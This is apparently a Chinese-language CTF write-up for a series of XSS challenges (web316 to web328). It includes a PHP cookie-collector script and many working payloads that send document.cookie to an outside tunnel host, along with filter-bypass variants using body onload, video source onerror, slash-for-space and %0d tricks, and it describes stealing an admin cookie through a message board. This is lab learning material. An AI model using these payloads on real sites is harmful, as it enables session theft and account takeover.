简介
这次把爪牙伸到了xss 嘿嘿嘿
开始日咯!
web316
用xss平台怎么也爆不出。。。
可能是姿势不对
用最原始的方法吧
在自己的服务器上写一个hack.php
<?php
$content = $_GET[1];
if(isset($content)){
file_put_contents('XSS/flag.txt',$content);
}else{
echo 'no date input';
}
下边拿到后直接把cookie转发
<script>document.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?1='+document.cookie</script>
web317
今天学习了一款xss自动扫描的工具 XSStrike
似乎很好用的呢
直接跑出了payload 随便拉一个来看一下
额 。。。好像没看懂
<hTmL/+/OnmousEover%0d=%0d[8].find(confirm)%0dx//
还是先自己来 慢慢来 从简单的来试
<img src=x onerror=alert('xss') />
直接弹出
<img newImage().src="http://wgm1yk1.nat.ipyingshe.com/hack.php?1="+document.cookie" />
额。。。
不行 不造为啥
貌似是图片后台不会点击。。。
web318,319
利用body标签
由于这种攻击方法向量,在给定页面中只有一个body标签,有些人可能认为它不起作用,但实际上,所有浏览器都会把它当事件处理器(Event Handler)来执行。在这里,可以在onpageshow事件中用提交body元素的方法,形成XSS Payload,当其中的body元素被解析后就会触发Payload
payload
<body onload="window.location.href='http://wgm1yk1.nat.ipyingshe.com/hack.php?1='+document.cookie"</body>
web320
上一个被ban了
试试别的 开始变难哩
虽然用工具不太好 但是(真到好用
<HTml%0doNpOinTEreNteR%0d=%0dalert(1)>
<HTml%0doNpOinTEreNteR%0d=%0dwindow.location.href='http://wgm1yk1.nat.ipyingshe.com/hack.php?1='+document.cookie>
web321
这里随便选择了 select 发现过滤了空格
直接用/
绕过
<body/onload="window.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?cmd='+document.cookie"></body>
web322
还可以用
<body/onload="window.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?cmd='+document.cookie"></body>
web323~6
<video><source/**/onerror=alert(1)>
<video><source/**/onerror="window.location.href='http://xxxxx.com/x.php?cmd='+document.cookie">
web327
收件人必须为admin
在留言板插 随便插
web328
<script>window.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?cmd='+document.cookie</script>
看了群主视频 学习了
思路:
看到自己能看到这个页面
管理员也能看到
于是在用户名和密码之中x
x完后可得到管理员cookie
中间有两个包 都可以改cookie 但第二个包更重要一点
改完后可得到flag